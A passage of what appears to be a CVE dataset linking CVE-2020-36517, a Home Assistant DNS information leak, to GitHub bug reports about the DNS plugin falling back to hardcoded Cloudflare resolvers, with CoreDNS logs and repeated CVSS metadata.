[INFO] 172.30.32.1:39897 - 45303 "PTR IN 2.0.17.172.in-addr.arpa. udp 41 false 512" NXDOMAIN qr,aa,rd,ra 41 0.091132884s [INFO] 172.30.32.1:54320 - 64334 "PTR IN 80.178.168.192.in-addr.arpa. udp 45 false 512" NXDOMAIN qr,aa,rd,ra 45 0.116535295s [INFO] 172.30.32.1:59641 - 63561 "PTR IN 84.178.168.192.in-addr.arpa. udp 45 false 512" NXDOMAIN qr,aa,rd,ra 45 0.049265856s [INFO] 172.30.32.1:54196 - 61682 "PTR IN 43.178.168.192.in-addr.arpa. udp 45 false 512" NXDOMAIN qr,aa,rd,ra 45 0.029521276s [INFO] 172.30.32.1:33093 - 37580 "PTR IN 1.178.168.192.in-addr.arpa. udp 44 false 512" NXDOMAIN qr,aa,rd,ra 44 0.038741049s [INFO] 172.30.32.1:44545 - 42001 "PTR IN 2.0.17.172.in-addr.arpa. udp 41 false 512" NXDOMAIN qr,aa,rd,ra 41 0.032553201s [INFO] 172.30.32.1:37139 - 44637 "PTR IN 80.178.168.192.in-addr.arpa. udp 45 false 512" NXDOMAIN qr,aa,rd,ra 45 2.032197136s [INFO] 172.30.32.1:43724 - 10416 "PTR IN 84.178.168.192.in-addr.arpa. udp 45 false 512" NXDOMAIN qr,aa,rd,ra 45 0.104368439s core-2021.6.6 supervisor-2021.06.6 Home Assistant OS 6.1 CPU armv6l
performance impact after dns update to 2021.06.0
https://api.github.com/repos/home-assistant/plugin-dns/issues/50/comments
8
2021-06-30T12:07:56Z
2022-04-25T16:25:28Z
https://github.com/home-assistant/plugin-dns/issues/50
933,637,335
50
3,303
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/51
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
Ha is configured with a local dns resolver, while all other means of resolving are blocked on our home automation subnet. When (re)started, HA dns runs perfectly fine, and can resolve all queries through the assigned server. ``` ha dns info host: 172.30.32.3 locals: - dns://192.168.111.1 servers: - dns://192.168.111.1 update_available: false version: 2021.06.0 version_latest: 2021.06.0 ~ $ ping google.be PING google.be (142.251.36.35): 56 data bytes ``` After a few hours, the resolver just stops resolving through the programmed server. and switches to dot 1.0.0.1/1.1.1.1:853 for all dns requests, which are all refused by the router ofcourse. Somehow HA jforgot, that 192.168.1111.1 is its assigned dns server. Edit: logs from the second the issue starts: > [ERROR] plugin/errors: 2 . NS: tls: DialWithDialer timed out > [INFO] 127.0.0.1:44137 - 6201 "NS IN . udp 40 true 2048" NOERROR - 0 1.001374795s > [ERROR] plugin/errors: 2 . NS: tls: DialWithDialer timed out > [INFO] 172.30.33.3:50563 - 6201 "NS IN . udp 40 false 4096" SERVFAIL qr,rd 17 6.071750661s > [INFO] 127.0.0.1:45411 - 6201 "NS IN . udp 40 true 2048" NOERROR - 0 1.00095742s > [ERROR] plugin/errors: 2 . NS: tls: DialWithDialer timed out > [INFO] 127.0.0.1:44137 - 6201 "NS IN . udp 40 true 2048" NOERROR - 0 1.000966169s > [ERROR] plugin/errors: 2 . NS: tls: DialWithDialer timed out > [INFO] 172.30.33.3:52280 - 6201 "NS IN . udp 40 false 4096" SERVFAIL qr,rd 17 6.008133092s > [INFO] 127.0.0.1:47155 - 3762 "A IN version.home-assistant.io. udp 54 true 2048" NOERROR - 0 1.004052137s > [ERROR] plugin/errors: 2 version.home-assistant.io. A: tls: DialWithDialer timed out > [INFO] 127.0.0.1:44272 - 3762 "A IN version.home-assistant.io. udp 54 true 2048" NOERROR - 0 1.000851399s > [ERROR] plugin/errors: 2 version.home-assistant.io. A: tls: DialWithDialer timed out > [INFO] 172.30.32.2:57753 - 3762 "A IN version.home-assistant.io. udp 43 false 512" SERVFAIL qr,rd 43 2.013838761s > [INFO] 127.0.0.1:44704 - 15932 "A IN data.buienradar.nl. udp 47 true 2048" NOERROR - 0 1.001158626s > [ERROR] plugin/errors: 2 data.buienradar.nl. A: tls: DialWithDialer timed out > [INFO] 127.0.0.1:33818 - 16449 "AAAA IN data.buienradar.nl. udp 47 true 2048" NOERROR - 0 1.003631786s > [ERROR] plugin/errors: 2 data.buienradar.nl. AAAA: tls: DialWithDialer timed out > [INFO] 127.0.0.1:60988 - 15932 "A IN data.buienradar.nl. udp 47 true 2048" NOERROR - 0 1.000984262s > [ERROR] plugin/errors: 2 data.buienradar.nl. A: tls: DialWithDialer timed out > [INFO] 172.30.32.1:45411 - 15932 "A IN data.buienradar.nl. udp 36 false 512" SERVFAIL qr,rd 36 2.005486429s > [INFO] 172.30.32.1:45411 - 15932 "A IN data.buienradar.nl. udp 36 false 512" SERVFAIL qr,aa,rd 36 0.00011969s > [INFO] 172.30.32.1:45411 - 15932 "A IN data.buienradar.nl. udp 36 false 512" SERVFAIL qr,aa,rd 36 0.000257307s > [INFO] 127.0.0.1:33982 - 16449 "AAAA IN data.buienradar.nl. udp 47 true 2048" NOERROR - 0 1.001272358s > [ERROR] plugin/errors: 2 data.buienradar.nl. AAAA: tls: DialWithDialer timed out > [INFO] 172.30.32.1:45411 - 15932 "A IN data.buienradar.nl. udp 36 false 512" SERVFAIL qr,aa,rd 36 0.000378729s > [INFO] 172.30.32.1:45411 - 15932 "A IN data.buienradar.nl. udp 36 false 512" SERVFAIL qr,aa,rd 36 0.000304851s > [INFO] 172.30.32.1:45411 - 16449 "AAAA IN data.buienradar.nl. udp 36 false 512" SERVFAIL qr,rd 36 2.010680479s > [INFO] 172.30.32.1:45411 - 16449 "AAAA IN data.buienradar.nl. udp 36 false 512" SERVFAIL qr,aa,rd 36 0.000205219s > [INFO] 172.30.32.1:45411 - 15932 "A IN data.buienradar.nl. udp 36 false 512" SERVFAIL qr,aa,rd 36 0.000374101s > [INFO] 172.30.32.1:45411 - 15932 "A IN data.buienradar.nl. udp 36 false 512" SERVFAIL qr,aa,rd 36 0.000223414s > [INFO] 172.30.32.1:45411 - 16449 "AAAA IN data.buienradar.nl. udp 36 false 512" SERVFAIL qr,aa,rd 36 0.000147082s > [INFO] 172.30.32.1:45411 - 16449 "AAAA IN data.buienradar.nl. udp 36 false 512" SERVFAIL qr,aa,rd 36 0.000172155s > [INFO] 172.30.32.1:45411 - 15932 "A IN data.buienradar.nl. udp 36 false 512" SERVFAIL qr,aa,rd 36 0.001195803s > [INFO] 127.0.0.1:56238 - 58622 "A IN een.be. udp 35 true 2048" NOERROR - 0 1.001122865s > [ERROR] plugin/errors: 2 een.be. A: tls: DialWithDialer timed out >
Dns stops resolving within hours
https://api.github.com/repos/home-assistant/plugin-dns/issues/51/comments
9
2021-07-11T20:22:04Z
2022-04-25T16:22:11Z
https://github.com/home-assistant/plugin-dns/issues/51
941,525,972
51
3,304
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/53
[ "Exploit", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
Applications should not hard-code their own DNS resolvers; they should use the configuration provided by the network (via DHCP) or by the user, perhaps with an overridable default if no other option exists. This is an anti-pattern: https://github.com/home-assistant/plugin-dns/blob/be7b7e7fc4460ef31483882e743ba4e3b62fe8c4/rootfs/usr/share/tempio/corefile#L30
Don't hard-code upstream DNS resolvers
https://api.github.com/repos/home-assistant/plugin-dns/issues/53/comments
2
2021-08-17T02:16:14Z
2021-09-16T16:56:17Z
https://github.com/home-assistant/plugin-dns/issues/53
972,238,371
53
3,305
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/54
[ "Exploit", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
ESPhome devices show up being "Online" only a few minutes after booting the system. After that, they turn to "Offline", although they are still online. mDNS resolving seems to breakdown within a few minutes after rebooting the OS. Running Home Assistant Operating System, which is, according to the site, the recommended installation method.
.local named devices (i.e. ESPHOME devices) only resolve for a few minutes after booting HA
https://api.github.com/repos/home-assistant/plugin-dns/issues/54/comments
13
2021-08-25T19:14:14Z
2022-04-25T16:26:23Z
https://github.com/home-assistant/plugin-dns/issues/54
979,542,869
54
3,306
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "cve@mitre.org", "tags": [ 